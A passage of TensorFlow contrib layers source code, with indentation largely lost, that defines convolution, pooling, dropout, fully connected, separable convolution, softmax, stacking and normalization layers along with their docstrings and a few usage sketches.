`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collections per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_op_scope`.
Returns:
a tensor representing the output of the operation.
Raises:
ValueError: if both 'rate' and `stride` are larger than one.
"""
with variable_scope.variable_op_scope([inputs],
scope, 'Conv', reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
if rate > 1 and (stride_h > 1 or stride_w > 1):
raise ValueError('Only one of rate or stride can be larger than one')
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w,
num_filters_in, num_outputs]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
if rate > 1:
outputs = nn.atrous_conv2d(inputs, weights, rate, padding=padding)
else:
outputs = nn.conv2d(inputs, weights, [1, stride_h, stride_w, 1],
padding=padding)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
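# Illustrative sketch (not part of the library): composing the layers defined
# above, with batch_norm acting as the normalizer for a convolution. The helper
# name, `images` (an assumed [batch, height, width, channels] float tensor) and
# `is_training` are assumptions introduced for the example.
def _example_conv_with_batch_norm(images, is_training=True):
  net = convolution2d(images, 64, [3, 3],
                      normalizer_fn=batch_norm,
                      normalizer_params={'is_training': is_training},
                      scope='conv1')
  net = avg_pool2d(net, [2, 2], scope='pool1')
  return net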
@add_arg_scope
def convolution2d_in_plane(
inputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Performs the same in-plane convolution to each channel independently.
This is useful for performing various simple channel-independent convolution
operations such as image gradients:
image = tf.constant(..., shape=(16, 240, 320, 3))
vert_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[2, 1])
horz_gradients = layers.conv2d_in_plane(image,
kernel=[1, -1],
kernel_size=[1, 2])
Args:
inputs: a 4-D tensor with dimensions [batch_size, height, width, channels].
kernel_size: a list of length 2 holding the [kernel_height, kernel_width] of
      the pooling. Can be an int if both values are the same.
stride: a list of length 2 `[stride_height, stride_width]`.
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding type to use, either 'SAME' or 'VALID'.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collections per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_op_scope`.
Returns:
A `Tensor` representing the output of the operation.
"""
with variable_scope.variable_op_scope(
[inputs], scope, 'ConvInPlane', reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, 1, 1]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
depthwise_weights = array_ops.tile(weights, [1, 1, num_filters_in, 1])
outputs = nn.depthwise_conv2d(inputs, depthwise_weights,
[1, stride_h, stride_w, 1], padding)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_filters_in,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def convolution2d_transpose(
inputs,
num_outputs,
kernel_size,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a convolution2d_transpose with an optional batch normalization layer.
The function creates a variable called `weights`, representing the
  kernel, that is convolved with the input. If `normalizer_fn` is `None`, a
second variable called 'biases' is added to the result of the operation.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_outputs: integer, the number of output filters.
kernel_size: a list of length 2 holding the [kernel_height, kernel_width] of
      the filters. Can be an int if both values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: one of 'VALID' or 'SAME'.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collections per variable.
outputs_collections: collection to add the outputs.
    trainable: whether or not the variables should be trainable.
scope: Optional scope for variable_op_scope.
Returns:
a tensor representing the output of the operation.
Raises:
ValueError: if 'kernel_size' is not a list of length 2.
"""
with variable_scope.variable_op_scope(
[inputs], scope, 'Conv2d_transpose', reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(
inputs.get_shape(), min_rank=4)
weights_shape = [kernel_h, kernel_w, num_outputs, num_filters_in]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable(
'weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
inputs_shape = array_ops.shape(inputs)
batch_size = inputs_shape[0]
height, width = inputs_shape[1], inputs_shape[2]
def get_deconv_dim(dim_size, stride_size, kernel_size, padding):
if isinstance(dim_size, ops.Tensor):
dim_size = math_ops.mul(dim_size, stride_size)
elif dim_size is not None:
dim_size *= stride_size
if padding == 'VALID' and dim_size is not None:
dim_size += max(kernel_size - stride_size, 0)
return dim_size
# Infer the dynamic output shape:
out_height = get_deconv_dim(height, stride_h, kernel_h, padding)
out_width = get_deconv_dim(width, stride_w, kernel_w, padding)
output_shape = array_ops.pack(
[batch_size, out_height, out_width, num_outputs])
outputs = nn.conv2d_transpose(inputs, weights, output_shape,
[1, stride_h, stride_w, 1],
padding=padding)
# Infer the static output shape:
out_shape = inputs.get_shape().as_list()
out_shape[-1] = num_outputs
out_shape[1] = get_deconv_dim(out_shape[1], stride_h, kernel_h, padding)
out_shape[2] = get_deconv_dim(out_shape[2], stride_w, kernel_w, padding)
outputs.set_shape(out_shape)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def dropout(inputs,
keep_prob=0.5,
noise_shape=None,
is_training=True,
outputs_collections=None,
scope=None):
"""Returns a dropout op applied to the input.
With probability `keep_prob`, outputs the input element scaled up by
`1 / keep_prob`, otherwise outputs `0`. The scaling is so that the expected
sum is unchanged.
Args:
inputs: the tensor to pass to the nn.dropout op.
keep_prob: A scalar `Tensor` with the same type as x. The probability
that each element is kept.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
is_training: A bool `Tensor` indicating whether or not the model
is in training mode. If so, dropout is applied and values scaled.
Otherwise, inputs is returned.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a tensor representing the output of the operation.
"""
with ops.op_scope([inputs], scope, 'Dropout') as sc:
inputs = ops.convert_to_tensor(inputs)
dropout_fn = lambda: nn.dropout(inputs, keep_prob, noise_shape)
id_fn = lambda: inputs
outputs = utils.smart_cond(is_training, dropout_fn, id_fn)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def flatten(inputs,
outputs_collections=None,
scope=None):
"""Flattens the input while maintaining the batch_size.
Assumes that the first dimension represents the batch.
Args:
inputs: a tensor of size [batch_size, ...].
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a flattened tensor with shape [batch_size, k].
Raises:
ValueError: if inputs.shape is wrong.
"""
with ops.op_scope([inputs], scope, 'Flatten') as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if (inputs_rank is None) or (inputs_rank < 2):
      raise ValueError('Inputs must have at least 2 dimensions.')
dims = inputs_shape[1:]
if not dims.is_fully_defined():
raise ValueError('Inputs 2nd dimension must be defined.')
k = dims.num_elements()
outputs = array_ops.reshape(inputs, [-1, k])
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def fully_connected(inputs,
num_outputs,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a fully connected layer.
`fully_connected` creates a variable called `weights`, representing a fully
connected weight matrix, which is multiplied by the `inputs` to produce a
`Tensor` of hidden units. If a `normalizer_fn` is provided (such as
`batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
None and a `biases_initializer` is provided then a `biases` variable would be
created and added the hidden units. Finally, if `activation_fn` is not `None`,
it is applied to the hidden units as well.
Note: that if `inputs` have a rank greater than 2, then `inputs` is flattened
prior to the initial matrix multiply by `weights`.
Args:
    inputs: A tensor with at least rank 2 and a value for the last dimension,
i.e. `[batch_size, depth]`, `[None, None, None, channels]`.
num_outputs: Integer, the number of output units in the layer.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collections per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_op_scope.
Returns:
the tensor variable representing the result of the series of operations.
Raises:
ValueError: if x has rank less than 2 or if its last dimension is not set.
"""
if not isinstance(num_outputs, int):
    raise ValueError('num_outputs should be integer, got %s.' % (num_outputs,))
with variable_scope.variable_op_scope([inputs],
scope,
'fully_connected',
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
inputs_shape = inputs.get_shape()
num_input_units = utils.last_dimension(inputs_shape, min_rank=2)
static_shape = inputs_shape.as_list()
static_shape[-1] = num_outputs
out_shape = array_ops.unpack(array_ops.shape(inputs))
out_shape[-1] = num_outputs
weights_shape = [num_input_units, num_outputs]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
if len(static_shape) > 2:
# Reshape inputs
inputs = array_ops.reshape(inputs, [-1, num_input_units])
outputs = standard_ops.matmul(inputs, weights)
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
if len(static_shape) > 2:
# Reshape back outputs
outputs = array_ops.reshape(outputs, array_ops.pack(out_shape))
outputs.set_shape(static_shape)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
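# Illustrative sketch (not part of the library): a small classification head
# built from the layers above. The helper name, `net` (an assumed 4-D activation
# tensor), `num_classes` and `is_training` are assumptions for the example.
def _example_fc_head(net, num_classes, is_training=True):
  net = flatten(net)
  net = fully_connected(net, 256, scope='fc1')
  net = dropout(net, keep_prob=0.5, is_training=is_training, scope='dropout1')
  return fully_connected(net, num_classes, activation_fn=None, scope='logits')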
@add_arg_scope
def max_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
outputs_collections=None,
scope=None):
"""Adds a Max Pooling op.
It is assumed by the wrapper that the pooling is only done per image and not
in depth or batch.
Args:
inputs: a tensor of size [batch_size, height, width, depth].
kernel_size: a list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: a list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: the padding method, either 'VALID' or 'SAME'.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
a tensor representing the results of the pooling operation.
Raises:
ValueError: if 'kernel_size' is not a 2-D list
"""
with ops.op_scope([inputs], scope, 'MaxPool2D') as sc:
inputs = ops.convert_to_tensor(inputs)
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
outputs = nn.max_pool(inputs,
ksize=[1, kernel_h, kernel_w, 1],
strides=[1, stride_h, stride_w, 1],
padding=padding)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def one_hot_encoding(labels,
num_classes,
on_value=1.0,
off_value=0.0,
outputs_collections=None,
scope=None):
"""Transform numeric labels into onehot_labels using tf.one_hot.
Args:
labels: [batch_size] target labels.
num_classes: total number of classes.
on_value: A scalar defining the on-value.
off_value: A scalar defining the off-value.
outputs_collections: collection to add the outputs.
scope: Optional scope for op_scope.
Returns:
one hot encoding of the labels.
"""
with ops.op_scope([labels, num_classes], scope, 'OneHotEncoding') as sc:
labels = ops.convert_to_tensor(labels)
if labels.dtype == dtypes.int32:
labels = standard_ops.to_int64(labels)
outputs = standard_ops.one_hot(labels,
num_classes,
on_value=on_value,
off_value=off_value)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _apply_activation(y, activation_fn, output_collections):
if activation_fn:
y = activation_fn(y)
ops.add_to_collections(list(output_collections or []) +
[ops.GraphKeys.ACTIVATIONS], y)
return y
def repeat(inputs, repetitions, layer, *args, **kwargs):
"""Applies the same layer with the same arguments repeatedly.
```python
y = repeat(x, 3, conv2d, 64, [3, 3], scope='conv1')
# It is equivalent to:
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_1')
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_2')
y = conv2d(x, 64, [3, 3], scope='conv1/conv1_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
  layers are called with `scope='repeat'`.
Args:
inputs: A `Tensor` suitable for layer.
repetitions: Int, number of repetitions.
layer: A layer with arguments `(inputs, *args, **kwargs)`
*args: Extra args for the layer.
**kwargs: Extra kwargs for the layer.
Returns:
a tensor result of applying the layer, repetitions times.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
with variable_scope.variable_op_scope([inputs], scope, 'Repeat'):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'repeat'
outputs = inputs
for i in range(repetitions):
kwargs['scope'] = scope + '_' + str(i+1)
outputs = layer(outputs, *args, **kwargs)
return outputs
@add_arg_scope
def separable_convolution2d(
inputs,
num_outputs,
kernel_size,
depth_multiplier,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a depth-separable 2D convolution with optional batch_norm layer.
This op first performs a depthwise convolution that acts separately on
channels, creating a variable called `depthwise_weights`. If `num_outputs`
is not None, it adds a pointwise convolution that mixes channels, creating a
  variable called `pointwise_weights`. Then, if `normalizer_fn` is None,
it adds bias to the result, creating a variable called 'biases', otherwise
it adds a batch normalization layer. It finally applies an activation function
to produce the end result.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_outputs: the number of pointwise convolution output filters. If is
None, then we skip the pointwise convolution stage.
kernel_size: a list of length 2: [kernel_height, kernel_width] of
      the filters. Can be an int if both values are the same.
depth_multiplier: the number of depthwise convolution output channels for
each input channel. The total number of depthwise convolution output
channels will be equal to `num_filters_in * depth_multiplier`.
stride: a list of length 2: [stride_height, stride_width], specifying the
depthwise convolution stride. Can be an int if both strides are the same.
padding: one of 'VALID' or 'SAME'.
activation_fn: activation function.
normalizer_fn: normalization function to use instead of `biases`. If
`normalize_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
      a dictionary containing a different list of collections per variable.
outputs_collections: collection to add the outputs.
    trainable: whether or not the variables should be trainable.
scope: Optional scope for variable_op_scope.
Returns:
A `Tensor` representing the output of the operation.
"""
with variable_scope.variable_op_scope(
[inputs], scope, 'SeparableConv2d', reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
depthwise_shape = [kernel_h, kernel_w,
num_filters_in, depth_multiplier]
depthwise_weights = variables.model_variable(
'depthwise_weights',
shape=depthwise_shape,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
strides = [1, stride_h, stride_w, 1]
if num_outputs is not None:
# Full separable convolution: Depthwise followed by pointwise convolution.
pointwise_shape = [1, 1, depth_multiplier * num_filters_in,
num_outputs]
pointwise_weights = variables.model_variable(
'pointwise_weights',
shape=pointwise_shape,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
outputs = nn.separable_conv2d(inputs,
depthwise_weights,
pointwise_weights,
strides,
padding)
else:
# Depthwise convolution only.
outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding)
num_outputs = depth_multiplier * num_filters_in
if normalizer_fn:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases)
if activation_fn:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections, sc.name, outputs)
@add_arg_scope
def softmax(logits, scope=None):
"""Performs softmax on Nth dimension of N-dimensional logit tensor.
For two-dimensional logits this reduces to tf.nn.softmax. The N-th dimension
needs to have a specified number of elements (number of classes).
Args:
logits: N-dimensional `Tensor` with logits, where N > 1.
scope: Optional scope for variable_op_scope.
Returns:
a `Tensor` with same shape and type as logits.
"""
# TODO(jrru): Add axis argument which defaults to last dimension.
with variable_scope.variable_op_scope([logits], scope, 'softmax'):
num_logits = utils.last_dimension(logits.get_shape(), min_rank=2)
logits_2d = array_ops.reshape(logits, [-1, num_logits])
predictions = nn.softmax(logits_2d)
predictions = array_ops.reshape(predictions, array_ops.shape(logits))
predictions.set_shape(logits.get_shape())
return predictions
def stack(inputs, layer, stack_args, **kwargs):
"""Builds a stack of layers by applying layer repeatedly using stack_args.
`stack` allows you to repeatedly apply the same operation with different
arguments `stack_args[i]`. For each application of the layer, `stack` creates
a new scope appended with an increasing number. For example:
```python
y = stack(x, fully_connected, [32, 64, 128], scope='fc')
# It is equivalent to:
x = fully_connected(x, 32, scope='fc/fc_1')
x = fully_connected(x, 64, scope='fc/fc_2')
y = fully_connected(x, 128, scope='fc/fc_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
layers are called with `scope='stack'`.
Args:
inputs: A `Tensor` suitable for layer.
layer: A layer with arguments `(inputs, *args, **kwargs)`
stack_args: A list/tuple of parameters for each call of layer.
**kwargs: Extra kwargs for the layer.
Returns:
a `Tensor` result of applying the stacked layers.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
if not isinstance(stack_args, (list, tuple)):
raise ValueError('stack_args need to be a list or tuple')
with variable_scope.variable_op_scope([inputs], scope, 'Stack'):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'stack'
outputs = inputs
for i in range(len(stack_args)):
kwargs['scope'] = scope + '_' + str(i+1)
layer_args = stack_args[i]
if not isinstance(layer_args, (list, tuple)):
layer_args = [layer_args]
outputs = layer(outputs, *layer_args, **kwargs)
return outputs
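# Illustrative sketch of the functools.partial case mentioned in the docstring
# (the names here are hypothetical, not part of the module):
#
#   fc_relu = functools.partial(fully_connected, activation_fn=nn.relu)
#   y = stack(x, fc_relu, [32, 64])
#   # With no explicit scope, the scope falls back to fc_relu.func.__name__,
#   # so the two calls land roughly under 'Stack/fully_connected_1' and
#   # 'Stack/fully_connected_2'.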
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
"""Normalizes the given input across the specified dimension to unit length.
Note that the rank of `input` must be known.
Args:
inputs: A `Tensor` of arbitrary size.
dim: The dimension along which the input is normalized.
    epsilon: A small value added to the sum of squared inputs (before the
      square root) to avoid division by zero.
scope: Optional scope for variable_op_scope.
Returns:
The normalized `Tensor`.
Raises:
    ValueError: If dim is negative or not smaller than the rank of 'inputs'.
"""
with variable_scope.variable_op_scope([inputs], scope, 'UnitNorm'):
if not inputs.get_shape():
raise ValueError('The input rank must be known.')
input_rank = len(inputs.get_shape().as_list())
if dim < 0 or dim >= input_rank:
raise ValueError(
          'dim must be non-negative and smaller than the input rank.')
lengths = math_ops.sqrt(epsilon + math_ops.reduce_sum(
math_ops.square(inputs), dim, True))
multiples = []
if dim > 0:
multiples.append(array_ops.ones([dim], dtypes.int32))
multiples.append(array_ops.slice(array_ops.shape(inputs), [dim], [1]))
if dim < (input_rank - 1):
multiples.append(array_ops.ones([input_rank - 1 - dim], dtypes.int32))
multiples = array_ops.concat(0, multiples)
return math_ops.div(inputs, array_ops.tile(lengths, multiples))
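# Minimal sketch of unit_norm (illustrative; `embeddings` is a hypothetical
# placeholder with a statically known rank, as the function requires):
#
#   embeddings = array_ops.placeholder(dtypes.float32, [None, 128])
#   normalized = unit_norm(embeddings, dim=1)
#   # Each row of `normalized` has L2 norm ~1 (up to the epsilon term).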
def legacy_fully_connected(x,
num_output_units,
activation_fn=None,
weight_init=initializers.xavier_initializer(),
bias_init=init_ops.zeros_initializer,
name=None,
weight_collections=(ops.GraphKeys.WEIGHTS,),
bias_collections=(ops.GraphKeys.BIASES,),
output_collections=(ops.GraphKeys.ACTIVATIONS,),
trainable=True,
weight_regularizer=None,
bias_regularizer=None):
# pylint: disable=anomalous-backslash-in-string
r"""Adds the parameters for a fully connected layer and returns the output.
A fully connected layer is generally defined as a matrix multiply:
`y = f(w * x + b)` where `f` is given by `activation_fn`. If
`activation_fn` is `None`, the result of `y = w * x + b` is
returned.
If `x` has shape [\\\(\\text{dim}_0, \\text{dim}_1, ..., \\text{dim}_n\\\)]
with more than 2 dimensions (\\\(n > 1\\\)), then we repeat the matrix
multiply along the first dimensions. The result r is a tensor of shape
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`],
where \\\( r_{i_0, ..., i_{n-1}, k} =
\\sum_{0 \\leq j < \\text{dim}_n} x_{i_0, ... i_{n-1}, j} \cdot w_{j, k}\\\).
This is accomplished by reshaping `x` to 2-D
[\\\(\\text{dim}_0 \\cdot ... \\cdot \\text{dim}_{n-1}, \\text{dim}_n\\\)]
before the matrix multiply and afterwards reshaping it to
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`].
This op creates `w` and optionally `b`. Bias (`b`) can be disabled by setting
`bias_init` to `None`.
The variable creation is compatible with `tf.variable_scope` and so can be
reused with `tf.variable_scope` or `tf.make_template`.
Most of the details of variable creation can be controlled by specifying the
initializers (`weight_init` and `bias_init`) and in which collections to place
the created variables (`weight_collections` and `bias_collections`; note that
the variables are always added to the `VARIABLES` collection). The output of
the layer can be placed in custom collections using `output_collections`.
The collections arguments default to `WEIGHTS`, `BIASES` and `ACTIVATIONS`,
respectively.
A per layer regularization can be specified by setting `weight_regularizer`
and `bias_regularizer`, which are applied to the weights and biases
respectively, and whose output is added to the `REGULARIZATION_LOSSES`
collection.
Args:
x: The input `Tensor`.
num_output_units: The size of the output.
    activation_fn: Activation function applied to the output, given as a
      function of a single `Tensor`. If `None`, no activation is applied.
weight_init: An optional weight initialization, defaults to
`xavier_initializer`.
bias_init: An initializer for the bias, defaults to 0. Set to `None` in
order to disable bias.
name: The name for this operation is used to name operations and to find
variables. If specified it must be unique for this scope, otherwise a
unique name starting with "fully_connected" will be created. See
`tf.variable_op_scope` for details.
weight_collections: List of graph collections to which weights are added.
bias_collections: List of graph collections to which biases are added.
output_collections: List of graph collections to which outputs are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
weight_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for weights.
bias_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for biases.
Returns:
The output of the fully connected layer.
Raises:
ValueError: if x has rank less than 2 or if its last dimension is not set.
"""
with variable_scope.variable_op_scope([x], name, 'fully_connected'):
x = ops.convert_to_tensor(x)
dims = x.get_shape().dims
if dims is None:
raise ValueError('dims of x must be known but is None')
if len(dims) < 2:
raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
num_input_units = dims[-1].value
if num_input_units is None:
raise ValueError('last dimension of x must be known but is None')
dtype = x.dtype.base_dtype
weight_collections = set(list(weight_collections or []) +
[ops.GraphKeys.VARIABLES])
w = variable_scope.get_variable('weights',
shape=[num_input_units, num_output_units],
dtype=dtype,
initializer=weight_init,
collections=weight_collections,
regularizer=weight_regularizer,
trainable=trainable)
x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
[-1, num_input_units])
y = standard_ops.matmul(x_2_dim, w)
if bias_init is not None:
bias_collections = set(list(bias_collections or []) +
[ops.GraphKeys.VARIABLES])
b = variable_scope.get_variable('bias',
shape=[num_output_units],
dtype=dtype,
initializer=bias_init,
